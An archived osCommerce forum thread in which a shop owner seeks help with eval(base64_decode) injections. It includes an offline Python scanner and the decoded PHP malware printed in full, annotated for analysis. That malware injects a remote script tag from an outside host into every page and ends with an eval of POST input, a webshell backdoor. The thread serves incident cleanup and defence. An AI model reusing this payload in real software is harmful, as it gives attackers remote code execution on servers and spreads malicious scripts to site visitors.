
osCommerce


eval(base64_decode.......


oscomm.1986


Posted

Hi

 

Our website got hacked or had a virus attack, and the code was modified: there are pieces of 'eval code' in various files of the website pages. After editing and correcting various pages the site is running now, but there are still pages with the eval code.

 

This is the actual code:

<?php eval(base64_decode('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')); ?>

 

Does anybody know anything about this eval code? Will it do anything harmful even after deleting it? Does anyone have any idea whether a person did this or if it is just some virus? We changed the FTP, SSH and database passwords. Any suggestions on what else we could do?

Posted


You should remove all infected code.

 

There are multiple posts here about this hack; please search the forums and see what other people have done.

 

take a look here:

 

http://forums.oscomm...cure-your-site/

 

 

 

http://www.oscommerce.com/forums/topic/345957-evalbase64-decode-hack/

Posted

Thanks for your reply. I didn't know this many were affected by this code. But I have a different problem here. We back up the site onto the same system, and when we tried to replace the affected code with the clean backup, it's all corrupted. Even the discs we burned are corrupted!! This might not have anything to do with the hacking, but now we have lost all our backups!!

 

So I had to manually check every PHP file to remove that code. Is there any better idea? And I've read some posts which say it keeps coming back. How long does it take to come back? And I've read in some posts to rename the 'admin' folder. But if I do that, wouldn't I have to change the name in every path which refers to admin?

Posted

If you read through all the posts on the subject you'll find most, if not all of your answers. You should always keep a master copy of your store on your computer (one that has never seen the internet) then use this to back up your store.

 

There are some major things to do to prevent infection:

 

Remove your osCommerce file manager file

 

Remove the define languages file

 

Rename the admin directory

 

Move your admin directory to another domain

 

but don't ignore the other security advice that is given

My store is currently running Phoenix 1.0.3.0

I'm currently working on 1.0.7.2 and hope to get it live before 1.0.8.0 arrives (maybe 🙄 )

I used to have a list of add-ons here but I've found that with the ones that supporters of Phoenix get, any other add-ons are not really necessary.

Posted


I try to keep backups of my site on a computer that either does not have access to the internet or that I'm 100% sure is safe. I also do a tape backup of my website on a daily basis.

 

If the files that are creating the eval code are still on your website, then regardless of whether you put a clean copy in place or not, the code will be present.

 

First things first, find out which directory the infected files are stored in. Use this to find out where:

 

http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx

 

 

Once you have found infected files, delete them.

 

Please read through those links I have provided there is a lot of information available that will answer many of your questions.
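An offline way to do the same search and decoding, added here as an example and not code from osCommerce or from anyone in this thread: the script below walks a PHP tree, finds every eval(base64_decode('...')) one-liner, decodes the payload and any base64_decode('...') literal nested inside it without pasting the malware into a third-party web page (which hands the attacker's indicators to whoever runs that site), and reports the remote <script src=...> each payload injects plus whether any decoded layer passes request input to eval(), which is a remote code execution backdoor. The directory it scans is a constructed fixture; the regexes, the placeholder host malware.example and the function names are this example's own assumptions.

```python
"""Offline scanner for eval(base64_decode('...')) injections in a PHP tree.

Added example, not osCommerce code and not the online decoder linked above.
It walks a directory, finds the injected one-liner, peels nested base64
layers without sending anything off-box, and reports what a responder needs:
the file, the remote <script src=...> the payload injects, and whether any
layer feeds request input ($_POST/$_GET/...) to eval(), i.e. a backdoor.
The fixture tree below is constructed for the example.
"""
import base64
import binascii
import os
import re
import tempfile

# Outer injection as it appears in the infected files.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)")
# Any further base64_decode('...') literal inside a decoded layer.
INNER_B64 = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")
SCRIPT_SRC = re.compile(r"<script[^>]*\ssrc=['\"]?([^'\" >]+)", re.I)
# eval() of user-controlled input: remote code execution for whoever knows the URL.
POST_EVAL = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b")


def decode_layers(b64, max_layers=5):
    """Decode b64, then every base64_decode('...') literal found inside the result,
    breadth-first, up to max_layers. Returns the decoded layers as text."""
    layers, pending = [], [b64]
    while pending and len(layers) < max_layers:
        try:
            text = base64.b64decode(pending.pop(0), validate=True).decode("latin-1")
        except (binascii.Error, ValueError):
            continue  # not valid base64 after all; skip this candidate
        layers.append(text)
        pending.extend(INNER_B64.findall(text))
    return layers


def analyse_file(path):
    """Return one finding per eval(base64_decode('...')) in the file."""
    with open(path, "rb") as fh:
        src = fh.read().decode("latin-1")
    findings = []
    for m in EVAL_B64.finditer(src):
        layers = decode_layers(m.group(1))
        joined = "\n".join(layers)
        findings.append({
            "file": path,
            "offset": m.start(),
            "layers": len(layers),
            "inject_urls": sorted(set(SCRIPT_SRC.findall(joined))),
            "post_backdoor": bool(POST_EVAL.search(joined)),
        })
    return findings


def scan_tree(root, exts=(".php", ".phtml", ".inc")):
    """Scan every PHP-like file under root."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(exts):
                findings.extend(analyse_file(os.path.join(dirpath, name)))
    return findings


def build_sample_tree():
    """Constructed fixture: one clean include and one page carrying a two-layer
    payload shaped like the one in this thread (host replaced with a placeholder)."""
    root = tempfile.mkdtemp(prefix="osc-scan-")
    os.makedirs(os.path.join(root, "includes"))
    inner_tag = "<script src=http://malware.example/inject.js ></script>"  # placeholder host
    inner_b64 = base64.b64encode(inner_tag.encode()).decode()
    payload = (
        "if(!isset($nfv1)){function nfv($s){"
        "$s=str_replace($a=base64_decode('" + inner_b64 + "'),'',$s);"
        "if(stristr($s,'<body'))$s=preg_replace('#(\\s*<body)#mi',$a.'\\1',$s);"
        "return $s;}}eval(base64_decode($_POST['e']));"
    )
    outer_b64 = base64.b64encode(payload.encode()).decode()
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php eval(base64_decode('" + outer_b64 + "')); ?>\n"
                 "<?php require('includes/application_top.php'); ?>\n")
    with open(os.path.join(root, "includes", "application_top.php"), "w") as fh:
        fh.write("<?php\n// clean file, nothing injected\n")
    return root


if __name__ == "__main__":
    for finding in scan_tree(build_sample_tree()):
        print(finding)
```

Run it against a copy of the webroot pulled down over SFTP rather than the live tree, and treat a clean result with care: this pattern only catches the plain eval(base64_decode('...')) form, so variants that go through gzinflate(), str_rot13() or string concatenation need the regexes extended.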

Posted


Hi

 

Thanks a lot for the reply. We will back up our website and save it on multiple systems from now on. I followed the link you suggested and decoded the eval code, and the output is:

 

// Guard: the same one-liner is injected into many files, so the functions are only declared once per request.
if(!isset($nfv1)){
    // Output filter, installed later as an ob_start() callback so it can rewrite each page before it is sent.
    function nfv($s){
        // Strip other injected <script> blocks (long obfuscated strings, eval/fromCharCode/document.write).
        if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
            foreach($a[0] as $v)
                if(count(explode("\n",$v))>5){
                    $e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
                    if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))
                        $s=str_replace($v,'',$s);
                }
        // Strip hidden <iframe> injections (width 0/1 or display:none).
        if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))
            foreach($a[0] as $v)
                if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))
                    $s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);
        // Remove any existing copy of its own <script src=...> tag, then insert it just before <body>
        // (or append it if the page has no <body> but contains ',a').
        $s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3BzZ3RlY2g3Mi5jb20vY2FsZW5kYXJ0ZXN0L3Byb2ZpbGUzLnBocCA+PC9zY3JpcHQ+'),'',$s);
        if(stristr($s,'<body'))
            $s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);
        elseif(strpos($s,',a'))
            $s.=$a;
        return $s;
    }
    // Error handler: on the first PHP error it calls the handler named in $nfv1 (if any), then
    // unwinds the current output buffers and re-creates them with nfv() as the outermost filter.
    function nfv2($a,$b,$c,$d){
        global $nfv1;
        $s=array();
        if(function_exists($nfv1))call_user_func($nfv1,$a,$b,$c,$d);
        foreach(@ob_get_status(1) as $v)
            if(($a=$v['name'])=='nfv')return;           // already installed
            elseif($a=='ob_gzhandler')break;
            else $s[]=array($a=='default output handler'?false:$a);
        for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}
        ob_start('nfv');
        for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}
    }
}
// Register nfv2 as the error handler, keeping the previous handler's name (if any) in $nfvl.
$nfvl=(($a=@set_error_handler('nfv2'))!='nfv2')?$a:0;
// Backdoor: any HTTP POST with a base64-encoded PHP payload in parameter 'e' is executed on the server.
eval(base64_decode($_POST['e']));

 

Does this mean anything? Will I be able to find where the infected file is, from this decoded code? Can anybody help me understand what this code means or does?

Posted

Oh and this part had to be decoded again:

 

 

$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3BzZ3RlY2g3Mi5jb20vY2FsZW5kYXJ0ZXN0L3Byb2ZpbGUzLnBocCA+PC9zY3JpcHQ+'),'',$s)

 

and the decoded code is:

 

<script src=http://psgtech72.com/calendartest/profile3.php ></script>

 

Does that mean this is the website which is responsible for the hack code? I tried to visit the site and got a warning "Reported attack site"!! Any clues, anybody?

Posted


That is just the site your users were being redirected to. It will be very hard to find who was doing it just by that.

 

I can't tell where those files are being stored as it's calling functions from some script.

 

Seems best to remove everything from your server and re-upload a set of clean files.

Archived

This topic is now archived and is closed to further replies.
